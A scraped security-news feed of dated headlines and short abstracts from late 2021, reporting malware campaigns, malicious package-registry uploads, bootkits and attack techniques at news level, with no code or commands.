RATDispenser is predominantly being used as a dropper (in 94% of samples analyzed by HP), meaning the malware doesn’t communicate over the network to deliver a malicious payload.HP Wolf Security
November 23, 2021
Over nine million Android devices infected by info-stealing trojan
Abstract
A large-scale malware campaign on Huawei's AppGallery has led to approximately 9,300,000 installs of Android trojans masquerading as over 190 different apps.BleepingComputer
November 22, 2021
New Golang-based Linux Malware Targeting eCommerce Websites
Abstract
Weaknesses in e-commerce portals are being exploited to deploy a Linux backdoor as well as a credit card skimmer that's capable of stealing payment information from compromised websites. "The attacker started with automated e-commerce attack probes, testing for dozens of weaknesses in common online store platforms," researchers from Sansec Threat Research said in an analysis. "After a day and a half, the attacker found a file upload vulnerability in one of the store's plugins." The name of the affected vendor was not revealed. The initial foothold was then leveraged to upload a malicious web shell and alter the server code to siphon customer data. Additionally, the attacker delivered a Golang-based malware called " linux_avp " that serves as a backdoor to execute commands remotely sent from a command-and-control server hosted in Beijing. Upon execution, the program is designed to remove itself from the disk and camouflage as a " ps -efThe Hacker News
November 22, 2021
New Memento ransomware uses password-protected WinRAR archives to block access to the files
Abstract
Memento ransomware group locks files inside WinRAR password-protected archives after having observed that its encryption process is blocked by security firms. In October, Sophos researchers spotted the Memento ransomware that adopts a curious...Security Affairs
November 21, 2021
Experts found 11 malicious Python packages in the PyPI repository
Abstract
Researchers discovered 11 malicious Python packages in the PyPI repository that can steal Discord access tokens, passwords, and conduct attacks. JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository...Security Affairs
November 19, 2021
11 Malicious PyPI Python Libraries Caught Stealing Discord Tokens and Installing Shells
Abstract
Cybersecurity researchers have uncovered as many as 11 malicious Python packages that have been cumulatively downloaded more than 41,000 times from the Python Package Index (PyPI) repository, and could be exploited to steal Discord access tokens, passwords, and even stage dependency confusion attacks. The Python packages have since been removed from the repository following responsible disclosure by DevOps firm JFrog: importantpackage / important-package, pptest, ipboards, owlmoon, DiscordSafety, trrfab, 10Cent10 / 10Cent11, yandex-yt, and yiffparty. Two of the packages ("importantpackage," "10Cent10," and their variants) were found obtaining a reverse shell on the compromised machine, giving the attacker full control over an infected machine. Two other packages "ipboards" and "trrfab" masqueraded as legitimate dependencies designed to be automatically imported by taking advantage of a technique called dependency confusion or namespace confusThe Hacker News
November 19, 2021
Android banking Trojan BrazKing is back with significant evasion improvements
Abstract
The BrazKing Android banking trojan is back with significant improvements and dynamic banking overlays to avoid detection. Researchers from IBM spotted a new version of the BrazKing Android banking trojan that pulls fake overlay screens from the command...Security Affairs
November 18, 2021
Android malware BrazKing returns as a stealthier banking trojan
Abstract
The BrazKing Android banking trojan has returned with dynamic banking overlays and a new implementation trick that enables it to operate without requesting risky permissions.BleepingComputer
November 18, 2021
Hackers deploy Linux malware, web skimmer on e-commerce servers
Abstract
Security researchers discovered that attackers are also deploying a Linux backdoor on compromised e-commerce servers after injecting a credit card skimmer into online shops' websites.BleepingComputer
November 16, 2021
Here are the new Emotet spam campaigns hitting mailboxes worldwide
Abstract
The Emotet malware kicked into action yesterday after a ten-month hiatus with multiple spam campaigns delivering malicious documents to mailboxes worldwide.BleepingComputer
November 16, 2021
New Blacksmith Exploit Bypasses Current Rowhammer Attack Defenses
Abstract
Cybersecurity researchers have demonstrated yet another variation of the Rowhammer attack affecting all DRAM (dynamic random-access memory) chips that bypasses currently deployed mitigations, thereby effectively compromising the security of the devices. The new technique — dubbed " Blacksmith " ( CVE-2021-42114 , CVSS score: 9.0) — is designed to trigger bit flips on target refresh rate-enabled DRAM chips with the help of novel "non-uniform and frequency-based" memory access patterns, according to a study jointly published by academics from ETH Zurich, Vrije Universiteit Amsterdam, and Qualcomm Technologies. Originally disclosed in 2014, Rowhammer refers to a fundamental hardware vulnerability that could be abused to alter or corrupt memory contents by taking advantage of DRAM's tightly-packed, matrix-like memory cell architecture to repeatedly access certain rows (aka "aggressors") that induces an electrical disturbance large enough to cause tThe Hacker News
November 16, 2021
Rooting Malware Is Back for Mobile. Here’s What to Look Out For.
Abstract
Hank Schless, senior manager of security solutions at Lookout, discusses AbstractEmu, mobile malware found on Google Play, Amazon Appstore and the Samsung Galaxy Store.Threatpost
November 16, 2021
SharkBot, a new Android Trojan targets banks in Europe
Abstract
Security researchers from Cleafy discovered a new Android banking trojan, named SharkBot, that is targeting banks in Europe. At the end of October, researchers from cyber security firms Cleafy and ThreatFabric have discovered a new Android banking...Security Affairs
November 15, 2021
SharkBot — A New Android Trojan Stealing Banking and Cryptocurrency Accounts
Abstract
Cybersecurity researchers on Monday took the wraps off a new Android trojan that takes advantage of accessibility features on the devices to siphon credentials from banking and cryptocurrency services in Italy, the U.K., and the U.S. Dubbed " SharkBot " by Cleafy, the malware is designed to strike a total of 27 targets — counting 22 unnamed international banks in Italy and the U.K. as well as five cryptocurrency apps in the U.S. — at least since late October 2021 and is believed to be in its early stages of development, with no overlaps found to that of any known families. "The main goal of SharkBot is to initiate money transfers from the compromised devices via Automatic Transfer Systems (ATS) technique bypassing multi-factor authentication mechanisms (e.g., SCA)," the researchers said in a report. "Once SharkBot is successfully installed in the victim's device, attackers can obtain sensitive banking information through the abuse of Accessibility ServThe Hacker News
November 15, 2021
Operation Reacharound – Emotet malware is back
Abstract
The Emotet botnet is still active, ten months after an international operation coordinated by Europol shut down its infrastructure. Early this year, law enforcement and judicial authorities worldwide conducted a joint operation, named Operation Ladybird,...Security Affairs
November 15, 2021
QAKBOT Trojan returns using Squirrelwaffle as a dropper
Abstract
Experts warn of a surge in infections of the QBot (aka Quakbot) banking trojan which seems to be associated with the rise of Squirrelwaffle. Researchers warn of a new wave of QBot (aka Qakbot) banking trojan infections that appears to be associated...Security Affairs
November 12, 2021
QAKBOT Loader Returns With New Techniques and Tools
Abstract
QAKBOT is a prevalent information-stealing malware that was first discovered in 2007. In recent years, its detection has become a precursor to many critical and widespread ransomware attacks.Trend Micro
November 12, 2021
QBot returns for a new wave of infections using Squirrelwaffle
Abstract
The activity of the QBot (also known as Quakbot) banking trojan is spiking again, and analysts from multiple security research firms attribute this to the rise of Squirrelwaffle.BleepingComputer
November 12, 2021
Malware uses Namesilo parking pages and Google’s custom pages to spread
Abstract
This technique is yet another attempt from the malicious actor to hide control channels to avoid being tracked, monitored, or blocked and it probably has served them well.Netlab
November 11, 2021
Careful: ‘Smart TV remote’ Android app on Google Play is malware
Abstract
Two Android apps sitting on the Google Play store have been found to contain malware this week. These apps are called 'Smart TV remote' and 'Halloween Coloring'.BleepingComputer
November 11, 2021
BazarBackdoor Now Abuses Windows 10 Apps Feature in ‘Call Me Back’ Attack
Abstract
Researchers from Sophos Labs said the attack was noticed after the firm's own employees were targeted with spam emails. These emails were written with at least a basic level of social engineering.ZDNet
November 10, 2021
Researchers Discover PhoneSpy Malware Spying on South Korean Citizens
Abstract
An ongoing mobile spyware campaign has been uncovered snooping on South Korean residents using a family of 23 malicious Android apps to siphon sensitive information and gain remote control of the devices. "With more than a thousand South Korean victims, the malicious group behind this invasive campaign has had access to all the data, communications, and services on their devices," Zimperium researcher Aazim Yaswant said. "The victims were broadcasting their private information to the malicious actors with zero indication that something was amiss." The Dallas-based mobile security company dubbed the campaign " PhoneSpy ." Zimperium did not attribute the spyware to a known threat actor. "The evidence surrounding PhoneSpy shows a familiar framework that has been passed around for years, updated by individuals and shared within private communities and back channels until assembled into what we see in this variation today," Richard Melick, the coThe Hacker News
November 10, 2021
New Android malware targets Netflix, Instagram, and Twitter users
Abstract
A new Android malware known as MasterFred uses fake login overlays to steal the credit card information of Netflix, Instagram, and Twitter users.BleepingComputer
November 10, 2021
These invisible characters could be hidden backdoors in your JS code
Abstract
Could malicious backdoors be hiding in your code, that otherwise appears perfectly clean to the human eye and text editors alike? A security researcher has shed light on how invisible characters can be snuck into JavaScript code to introduce security risks, like backdoors, into your software.BleepingComputer
November 08, 2021
Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit
Abstract
At least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a recently patched critical vulnerability in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution. The spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor. "The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation," researchers from Palo Alto Networks' Unit 42 threat intelligence team said in a report. "Several other tools have novel characteristics or haThe Hacker News
November 07, 2021
Two NPM Packages With 22 Million Weekly Downloads Found Backdoored
Abstract
In what's yet another instance of supply chain attack targeting open-source software repositories, two popular NPM packages with cumulative weekly downloads of nearly 22 million were found to be compromised with malicious code by gaining unauthorized access to the respective developer's accounts. The two libraries in question are " coa ," a parser for command-line options, and " rc ," a configuration loader, both of which were tampered by an unidentified threat actor to include "identical" password-stealing malware. All versions of coa starting with 2.0.3 and above — 2.0.3, 2.0.4, 2.1.1, 2.1.3, 3.0.1, and 3.1.3 — are impacted, and users of the affected versions are advised to downgrade to 2.0.2 as soon as possible and check their systems for suspicious activity, according to a GitHub advisory published on November 4. In a similar vein, versions 1.2.9, 1.3.9, and 2.3.9 of rc have been found laced with malware, with an independent alert uThe Hacker News
November 5, 2021
npm libraries coa and rc have been hijacked to deliver password-stealing malware
Abstract
Two popular npm libraries, coa and rc, have been hijacked: threat actors replaced them with versions laced with password-stealing malware. The security team of the npm JavaScript package warns that two popular npm libraries, coa and rc, have...Security Affairs
November 04, 2021
Popular ‘coa’ NPM library hijacked to steal user passwords
Abstract
Popular npm library 'coa' was hijacked today with malicious code injected into it, ephemerally impacting React pipelines around the world. The 'coa' library, short for Command-Option-Argument, receives about 9 million weekly downloads on npm, and is used by almost 5 million open source repositories on GitHub.BleepingComputer
November 3, 2021
Mekotio Banking Trojan Resurges with Tweaked Code, Stealthy Campaign
Abstract
The banker, aka Metamorfo, is roaring back after Spanish police arrested more than a dozen gang members.Threatpost
November 03, 2021
Mekotio Banking Trojan Resurfaces with New Attacking and Stealth Techniques
Abstract
The operators behind the Mekotio banking trojan have resurfaced with a shift in its infection flow so as to stay under the radar and evade security software, while staging nearly 100 attacks over the last three months. "One of the main characteristics […] is the modular attack which gives the attackers the ability to change only a small part of the whole in order to avoid detection," researchers from Check Point Research said in a report shared with The Hacker News. The latest wave of attacks is said to primarily target victims located in Brazil, Chile, Mexico, Peru, and Spain. The development comes after Spanish law enforcement agencies in July 2021 arrested 16 individuals belonging to a criminal network in connection with operating Mekotio and another banking malware called Grandoreiro as part of a social engineering campaign targeting financial institutions in Europe. The evolved version of the Mekotio malware strain is designed for compromising Windows systems witThe Hacker News
November 03, 2021
Stealthier version of Mekotio banking trojan spotted in the wild
Abstract
A new version of a banking trojan known as Mekotio is being deployed in the wild, with malware analysts reporting that it's using a new, stealthier infection flow.BleepingComputer
November 03, 2021
BlackMatter ransomware claims to be shutting down due to police pressure
Abstract
The BlackMatter ransomware is allegedly shutting down its operation due to pressure from the authorities and recent law enforcement operations.BleepingComputer
November 2, 2021
Trojan Source attack method allows hiding flaws in source code
Abstract
Researchers devised a new attack method called 'Trojan Source' that allows hiding vulnerabilities in the source code of a software project. Trojan Source is a new attack technique demonstrated by a group of Cambridge researchers that can allow threat...Security Affairs
November 1, 2021
‘Trojan Source’ Hides Invisible Bugs in Source Code
Abstract
The old RLO trick of exploiting how Unicode handles script ordering and a related homoglyph attack can imperceptibly switch the real name of malware.Threatpost
November 01, 2021
New ‘Trojan Source’ Technique Lets Hackers Hide Vulnerabilities in Source Code
Abstract
A novel class of vulnerabilities could be leveraged by threat actors to inject visually deceptive malware in a way that's semantically permissible but alters the logic defined by the source code, effectively opening the door to more first-party and supply chain risks. Dubbed " Trojan Source attacks ," the technique "exploits subtleties in text-encoding standards such as Unicode to produce source code whose tokens are logically encoded in a different order from the one in which they are displayed, leading to vulnerabilities that cannot be perceived directly by human code reviewers," Cambridge University researchers Nicholas Boucher and Ross Anderson said in a newly published paper. The vulnerabilities — tracked as CVE-2021-42574 and CVE-2021-42694 — affect compilers of all popular programming languages such as C, C++, C#, JavaScript, Java, Rust, Go, and Python. Compilers are programs that translate high-level human-readable source code into their lower-lThe Hacker News
October 31, 2021
Rogue QR Codes Steal Microsoft Credentials and Crypto Funds
Abstract
Recently, researchers uncovered an email-based phishing scam containing QR codes in a bid to steal users’ Microsoft credentials and other data.Cyware Alerts - Hacker News
October 29, 2021
This New Android Malware Can Gain Root Access to Your Smartphones
Abstract
An unidentified threat actor has been linked to a new Android malware strain that features the ability to root smartphones and take complete control over infected devices while simultaneously taking steps to evade detection. The malware has been named " AbstractEmu " owing to its use of code abstraction and anti-emulation checks undertaken to thwart analysis right from the moment the apps are opened. Notably, the global mobile campaign is engineered to target and infect as many devices as possible indiscriminately. Lookout Threat Labs said it found a total of 19 Android applications that posed as utility apps and system tools like password managers, money managers, app launchers, and data-saving apps, seven of which contained the rooting functionality. Only one of the rogue apps, called Lite Launcher, made its way to the official Google Play Store, attracting a total of 10,000 downloads before it was purged. The apps are said to have been prominently distributed viaThe Hacker News
October 29, 2021
Snake malware biting hard on 50 apps for only $25
Abstract
Cybercriminals are flooding to use the Snake password-stealing trojan, making it one of the popular malware families used in attacks.BleepingComputer
October 28, 2021
TrickBot malware dev extradited to U.S. faces 60 years in prison
Abstract
A Russian national believed to be a member of the TrickBot malware development team has been extradited to the U.S. and is currently facing charges that could get him 60 years in prison.BleepingComputer
October 28, 2021
New Wslink Malware Loader Runs as a Server and Executes Modules in Memory
Abstract
Cybersecurity researchers on Wednesday took the wraps off a "simple yet remarkable" malware loader for malicious Windows binaries targeting Central Europe, North America and the Middle East. Codenamed " Wslink " by ESET, this previously undocumented malware stands apart from the rest in that it runs as a server and executes received modules in memory. There are no specifics available on the initial compromise vector and there are no code or operational overlaps that tie this tool to a known threat actor group. The Slovak cybersecurity firm noted that it has seen only a handful of detections in the past two years, suggesting that it could be used in highly-targeted cyber infiltrations. Wslink is designed to run as a service and can accept encrypted portable executable (PE) files from a specific IP address, which are then decrypted and loaded into memory prior to execution. To achieve this, the client (i.e., the victim) and the server perform a handshake that inThe Hacker News
October 28, 2021
Wslink, a previously undescribed loader for Windows binaries
Abstract
ESET researchers discovered a previously undescribed loader for Windows binaries, tracked as Wslink, that runs as a server and executes modules in memory. ESET researchers discovered Wslink, a previously undescribed loader for Windows binaries that,...Security Affairs
October 28, 2021
Malicious NPM Libraries Caught Installing Password Stealer and Ransomware
Abstract
Malicious actors have yet again published two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, with the goal of stealing credentials, installing remote access trojans, and infecting the compromised systems with ransomware. The bogus packages — named " noblox.js-proxy " and " noblox.js-proxies " — were found to impersonate a library called " noblox.js ," a Roblox game API wrapper available on NPM that boasts nearly 20,000 weekly downloads, with the poisoned libraries downloaded a total of 281 and 106 times respectively. According to Sonatype researcher Juan Aguirre, who discovered the malicious NPM packages, the author of noblox.js-proxy first published a benign version that was later tampered with to add obfuscated text, in reality a Batch (.bat) script, to the post-installation JavaScript file. This Batch script, in turn, downloads malicious executablesThe Hacker News
October 28, 2021
AbstractEmu, a new Android malware with rooting capabilities
Abstract
AbstractEmu is a new Android malware that can root infected devices to take complete control and evade detection with different tricks. Security researchers at the Lookout Threat Labs have discovered a new Android malware, dubbed AbstractEmu,...Security Affairs
October 28, 2021
New AbstractEmu malware roots Android devices, evades detection
Abstract
New Android malware can root infected devices to take complete control and silently tweak system settings, as well as evade detection using code abstraction and anti-emulation checks.BleepingComputer
October 27, 2021
Hackers Using Squirrelwaffle Loader to Deploy Qakbot and Cobalt Strike
Abstract
A new spam email campaign has emerged as a conduit for a previously undocumented malware loader that enables the attackers to gain an initial foothold into enterprise networks and drop malicious payloads on compromised systems. "These infections are also used to facilitate the delivery of additional malware such as Qakbot and Cobalt Strike, two of the most common threats regularly observed targeting organizations around the world," said researchers with Cisco Talos in a technical write-up. The malspam campaign is believed to have commenced in mid-September 2021 via laced Microsoft Office documents that, when opened, trigger an infection chain that leads to the machines getting infected with a malware dubbed SQUIRRELWAFFLE . Mirroring a technique that's consistent with other phishing attacks of this kind, the latest operation leverages stolen email threads to give it a veil of legitimacy and trick unsuspecting users into opening the attachments. What's more, tThe Hacker News
October 27, 2021
Malicious NPM libraries install ransomware, password stealer
Abstract
Malicious NPM packages pretending to be Roblox libraries are delivering ransomware and password-stealing trojans on unsuspecting users.BleepingComputer
October 26, 2021
SquirrelWaffle Loader Malspams, Packing Qakbot, Cobalt Strike
Abstract
Say hello to what could be the next big spam player: SquirrelWaffle, which is spreading with increasing frequency via spam campaigns and infecting systems with a new malware loader.Threatpost
October 26, 2021
Spammers use Squirrelwaffle malware to drop Cobalt Strike
Abstract
A new malware threat named Squirrelwaffle has emerged in the wild, supporting actors with an initial foothold and a way to drop malware onto compromised systems and networks.BleepingComputer
October 26, 2021
Magnitude EK Exploiting Chromium-based Browser Flaws
Abstract
After Internet Explorer, Magnitude Exploit Kit has been observed infecting Chromium-based browsers running on Windows OS in a series of attacks. It abuses two flaws: the first one is a remote code execution issue and the other is a privilege escalation bug. Researchers recommend ensuring timely pat ...Cyware Alerts - Hacker News
October 26, 2021
Malicious Firefox Add-ons Block Browser From Downloading Security Updates
Abstract
Mozilla on Monday disclosed it blocked two malicious Firefox add-ons installed by 455,000 users that were found misusing the Proxy API to impede downloading updates to the browser. The two extensions in question, named Bypass and Bypass XM, "interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content," Mozilla's Rachel Tublitz and Stuart Colville said. Because the Proxy API can be used to proxy web requests, abuse of the API could effectively let a bad actor control how the Firefox browser connects to the internet. In addition to blocking the extensions to prevent installation by other users, Mozilla said it is pausing approvals for new add-ons that use the proxy API until the fixes are broadly available. What's more, the California-based non-profit said it'd deployed a system add-on named " Proxy Failover " that shipsThe Hacker News
October 26, 2021
Brutal WordPress plugin bug allows subscribers to wipe sites
Abstract
A high severity security flaw found in a WordPress plugin with more than 8,000 active installs can let authenticated attackers reset and wipe vulnerable websites.BleepingComputer
October 26, 2021
SquirrelWaffle Malware Family Leverages Malspam Emails to Deliver Qakbot, Cobalt Strike
Abstract
It provides threat actors with an initial foothold that can be used to facilitate further compromise or other malware infections depending on how attackers choose to attempt to monetize their access.Cisco Talos
October 25, 2021
Mozilla blocks malicious add-ons installed by 455K Firefox users
Abstract
Mozilla blocked malicious Firefox add-ons installed by roughly 455,000 users after discovering in early June that they were abusing the proxy API to block Firefox updates.BleepingComputer
October 23, 2021
Malicious Packages Disguised as JavaScript Libraries Found Full Text
Abstract
Researchers at open-source software firm Sonatype have uncovered multiple malicious packages that disguise themselves as legitimate JavaScript libraries on npm registries to launch cryptominers on Windows, macOS and Linux machines.Gov Info Security
October 22, 2021
Microsoft: WizardUpdate Mac malware adds new evasion tactics Full Text
Abstract
Microsoft says it found new variants of macOS malware known as WizardUpdate (also tracked as UpdateAgent or Vigram), updated to use new evasion and persistence tactics.BleepingComputer
October 22, 2021
Researchers Discover Microsoft-Signed FiveSys Rootkit in the Wild Full Text
Abstract
A newly identified rootkit has been found with a valid digital signature issued by Microsoft; it has been used for over a year to proxy traffic to internet addresses of interest to the attackers, targeting online gamers in China. Bucharest-headquartered cybersecurity technology company Bitdefender named the malware "FiveSys," calling out its possible credential theft and in-game-purchase hijacking motives. The Windows maker has since revoked the signature following responsible disclosure. "Digital signatures are a way of establishing trust," Bitdefender researchers said in a white paper, adding "a valid digital signature helps the attacker navigate around the operating system's restrictions on loading third-party modules into the kernel. Once loaded, the rootkit allows its creators to gain virtually unlimited privileges." Rootkits are both evasive and stealthy as they offer threat actors an entrenched foothold onto victims' systems and conceal... The Hacker News
October 22, 2021
FiveSys, a new digitally-signed rootkit spotted by Bitdefender experts Full Text
Abstract
Bitdefender researchers discovered a new rootkit named FiveSys that abuses a Microsoft-issued digital signature to evade detection. FiveSys is a new rootkit discovered by researchers from Bitdefender; it is able to evade detection by abusing...Security Affairs
October 21, 2021
RAT malware spreading in Korea through webhards and torrents Full Text
Abstract
An ongoing malware distribution campaign targeting South Korea is disguising RATs (remote access trojans) as an adult game shared via webhards and torrents.BleepingComputer
October 19, 2021
A New Variant of FlawedGrace Spreading Through Mass Email Campaigns Full Text
Abstract
Cybersecurity researchers on Tuesday took the wraps off a mass volume email attack staged by a prolific cybercriminal gang affecting a wide range of industries, with one of its region-specific operations notably targeting Germany and Austria. Enterprise security firm Proofpoint tied the malware campaign with high confidence to TA505, which is the name assigned to the financially motivated threat group that's been active in the cybercrime business since at least 2014, and is behind the infamous Dridex banking trojan and other arsenals of malicious tools such as FlawedAmmyy, FlawedGrace, Neutrino botnet, and Locky ransomware, among others. The attacks are said to have started as a series of low-volume email waves, delivering only several thousand messages in each phase, before ramping up in late September and as recently as October 13, resulting in tens to hundreds of thousands of emails. "Many of the campaigns, especially the large volume ones, strongly resemble the his... The Hacker News
October 18, 2021
Bugs in malware create ‘backdoors’ for security researchers Full Text
Abstract
New research from cloud security firm Zscaler, presented at the recent VB2021 conference, exploits bugs and coding errors in malware code to thwart infections by botnets, ransomware, and trojans.The Daily Swig
October 18, 2021
Experts spotted an Ad-Blocking Chrome extension injecting malicious ads Full Text
Abstract
Researchers warn of an ad-blocking Chrome extension that was abused by threat actors to inject ads into Google search pages. Researchers from Imperva have spotted a new deceptive ad injection campaign that is targeting users of some large websites...Security Affairs
October 17, 2021
Fake Android Apps Steal Credentials from Japanese Telecom Users Full Text
Abstract
An Android-based phishing campaign was observed targeting customers of telecommunication services based in Japan. The malware-laced fake app steals credentials and session cookies. Experts recommend avoiding such risks by not downloading apps from unknown third-party stores.Cyware Alerts - Hacker News
October 15, 2021
Ad-Blocking Chrome Extension Caught Injecting Ads in Google Search Pages Full Text
Abstract
A new deceptive ad injection campaign has been found leveraging an ad blocker extension for Google Chrome and Opera web browsers to sneakily insert ads and affiliate codes on websites, according to new research from cybersecurity firm Imperva. The findings come following the discovery of rogue domains distributing an ad injection script in late August 2021 that the researchers connected to an add-on called AllBlock. The extension has since been pulled from both the Chrome Web Store and Opera add-ons marketplaces. While AllBlock is designed to block ads legitimately, the JavaScript code is injected into every new tab opened on the browser. It works by identifying and sending all links in a web page — typically on search engine results pages — to a remote server, which responds with a list of websites to replace the genuine links with, leading to a scenario where, upon clicking a link, the victim is redirected to a different page. "When the user clicks on any modified li... The Hacker News
October 15, 2021
Adblocker promises to block ads, injects them instead Full Text
Abstract
Researchers at Imperva uncovered a new ad injection campaign based on an adblocker named AllBlock. The AllBlock extension was available at the time of writing for Chrome and Opera in the respective web stores.Malwarebytes Labs
October 14, 2021
Malicious Chrome ad blocker injects ads behind the scenes Full Text
Abstract
The AllBlock Chromium ad blocking extension has been found to be injecting hidden affiliate links that generate commissions for the developers.BleepingComputer
October 13, 2021
New FontOnLake Malware Cripples Linux Systems Full Text
Abstract
ESET unearthed a new malware strain, dubbed FontOnLake, that targets Linux systems and appears to have claimed a limited number of victims in Southeast Asia. The malware appears to have a sneaky nature and an advanced design. Security teams are advised to proactively prepare their defenses against ... Cyware Alerts - Hacker News
October 13, 2021
Brizy WordPress Plugin Exploit Chains Allow Full Site Takeovers Full Text
Abstract
A stored XSS and arbitrary file-upload bug can be paired with an authorization bypass to wreak havoc.Threatpost
October 12, 2021
There is Lot More About Fake iTerm2 Apps than Thought Earlier Full Text
Abstract
Trend Micro sheds light on the ZuRu malware campaign that collects private data from a victim's machine. Further analysis of the fake iTerm2 app's Apple Distribution certificate led to the discovery of more trojanized apps on VirusTotal. Stay vigilant while downloading software online from untrus ... Cyware Alerts - Hacker News
October 12, 2021
New UEFI Bootkit Performs Espionage Full Text
Abstract
A new ESPecter bootkit was uncovered that performs cyberespionage and compromises system partitions. Signs in the malware's components reveal that the attackers could be Chinese-speaking. For protection, experts suggest applying security patches quickly.Cyware Alerts - Hacker News
October 12, 2021
Photo editor Android app STILL sitting on Google Play store is malware Full Text
Abstract
An Android app sitting on the Google Play store touts itself to be a photo editor app. But, it contains code that steals the user's Facebook credentials to potentially run ad campaigns on the user's behalf, with their payment information. The app has scored over 5K installs, with similar spyware apps having 500K+ installs.BleepingComputer
October 10, 2021
FontOnLake malware infects Linux systems via trojanized utilities Full Text
Abstract
A newly discovered malware family has been infecting Linux systems concealed in legitimate binaries. Dubbed FontOnLake, the threat delivers backdoor and rootkit components.BleepingComputer
October 08, 2021
Researchers Warn of FontOnLake Rootkit Malware Targeting Linux Systems Full Text
Abstract
Cybersecurity researchers have detailed a new campaign that likely targets entities in Southeast Asia with a previously unrecognized Linux malware that's engineered to enable remote access for its operators, in addition to amassing credentials and functioning as a proxy server. The malware family, dubbed "FontOnLake" by Slovak cybersecurity firm ESET, is said to feature "well-designed modules" that are continuously being upgraded with new features, indicating an active development phase. Samples uploaded to VirusTotal point to the possibility that the very first intrusions utilizing this threat have been happening as early as May 2020. Avast and Lacework Labs are tracking the same malware under the moniker HCRootkit. "The sneaky nature of FontOnLake's tools in combination with advanced design and low prevalence suggest that they are used in targeted attacks," ESET researcher Vladislav Hrčka said. "To collect data or conduct other malic... The Hacker News
October 07, 2021
Vidar stealer abuses Mastodon to silently get C2 configuration Full Text
Abstract
The Vidar stealer has returned in a new campaign that abuses the Mastodon social media network to get C2 configuration without raising alarms.BleepingComputer
October 6, 2021
ESPecter Bootkit Malware Haunts Victims with Persistent Espionage Full Text
Abstract
The rare UEFI bootkit drops a fully featured backdoor on PCs and gains the ultimate persistence by modifying the Windows Boot Manager.Threatpost
October 6, 2021
Mana Tools: A Malware C2 Panel with a Past Full Text
Abstract
Mana Tools was first reported in 2019 by Yoroi researchers who identified it as a fork of the AzoRult 3.2 malware created by a Pakistani actor named Aqib Waseem, better known as Hagga.Risk IQ
October 5, 2021
FinFisher is One of the Stealthiest Malware: Kaspersky Full Text
Abstract
Kaspersky laid bare an eight-month-long investigation into FinSpy operations, revealing multiple insights about the new upgrades in the spyware. Using bootkits, attackers are able to control the operating system's boot process and disable defenses by evading the Secure Boot mechanism of the sys ... Cyware Alerts - Hacker News
October 05, 2021
Researchers Discover UEFI Bootkit Targeting Windows Computers Since 2012 Full Text
Abstract
Cybersecurity researchers on Tuesday revealed details of a previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit that has been put to use by threat actors to backdoor Windows systems as early as 2012 by modifying a legitimate Windows Boot Manager binary to achieve persistence, once again demonstrating how technology meant to secure the environment prior to loading the operating system is increasingly becoming a "tempting target." Slovak cybersecurity firm ESET codenamed the new malware "ESPecter" for its ability to persist on the EFI System Partition (ESP), in addition to circumventing Microsoft Windows Driver Signature Enforcement to load its own unsigned driver that can be used to facilitate espionage activities such as document theft, keylogging, and screen monitoring by periodically capturing screenshots. "ESPecter shows that threat actors are relying not only on UEFI firmware implants when it comes to pre-OS persistence and,... The Hacker News
October 5, 2021
Analyzing LockBit’s Data Exfiltration Model Full Text
Abstract
Yoroi Malware ZLAB analyzed the new working model of LockBit 2.0, which has recently developed its custom tool specialized in data exfiltration. The RaaS group has been helping its partners by providing the StealBit data exfiltration service. With the proliferation of such tools, protecting sensitiv ... Cyware Alerts - Hacker News
October 05, 2021
New UEFI bootkit used to backdoor Windows devices since 2012 Full Text
Abstract
A newly discovered and previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit has been used by attackers to backdoor Windows systems by hijacking the Windows Boot Manager since at least 2012.BleepingComputer
October 4, 2021
Encrypted & Fileless Malware Sees Big Growth Full Text
Abstract
An analysis of second-quarter malware trends shows that threats are becoming stealthier.Threatpost
October 4, 2021
TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text
Abstract
Proofpoint researchers have discovered a new Ursnif banking Trojan campaign carried out by a group tracked as TA544 that is targeting organizations in Italy. The experts observed nearly 20 notable campaigns.Security Affairs
October 2, 2021
Flubot Android banking Trojan spreads via fake security updates Full Text
Abstract
The Flubot Android malware is now leveraging fake security update warnings to trick users into installing the malicious code. Threat actors behind the Flubot Android malware are now leveraging fake security updates to trick victims into installing...Security Affairs
October 2, 2021
Password-stealing Android malware uses sneaky security warning to trick you into downloading Full Text
Abstract
FluBot attacks have commonly come in the form of text messages which claim the recipient has missed a delivery, asking them to click a link to install an app to organize a redelivery. This app installs the malware.ZDNet
October 1, 2021
Hydra Android trojan campaign targets customers of European banks Full Text
Abstract
Experts warn of a new Hydra banking trojan campaign targeting European e-banking platform users, including the customers of Commerzbank. Experts warn of a malware campaign targeting European e-banking platform users with the Hydra banking trojan....Security Affairs
October 01, 2021
Flubot Android malware now spreads via fake security updates Full Text
Abstract
The Flubot malware has switched to a new and likely more effective lure to compromise Android devices, now trying to trick its victims into infecting themselves with the help of fake security updates warning them of Flubot infections.BleepingComputer
October 01, 2021
Hydra malware targets customers of Germany’s second largest bank Full Text
Abstract
The Hydra banking trojan is back to targeting European e-banking platform users, and more specifically, customers of Commerzbank, Germany's second-largest financial institution.BleepingComputer
October 01, 2021
Beware of Fake Amnesty International Antivirus for Pegasus that Hacks PCs with Malware Full Text
Abstract
In yet another indicator of how hacking groups are quick to capitalize on world events and improvise their attack campaigns for maximum impact, threat actors have been discovered impersonating Amnesty International to distribute malware that purports to be security software designed to safeguard against NSO Group's Pegasus surveillanceware. "Adversaries have set up a phony website that looks like Amnesty International's — a human rights-focused non-governmental organization — and points to a promised antivirus tool to protect against the NSO Group's Pegasus tool," Cisco Talos researchers said. "However, the download actually installs the little-known Sarwent malware." The countries most affected by the campaign include the U.K., the U.S., Russia, India, Ukraine, Czech Republic, Romania, and Colombia. While it's unclear as to how the victims are lured into visiting the fake Amnesty International website, the cybersecurity firm surmised the atta... The Hacker News
September 30, 2021
Revived Mirai Variant Now Targets a Zero-Day in Ruijie Routers Full Text
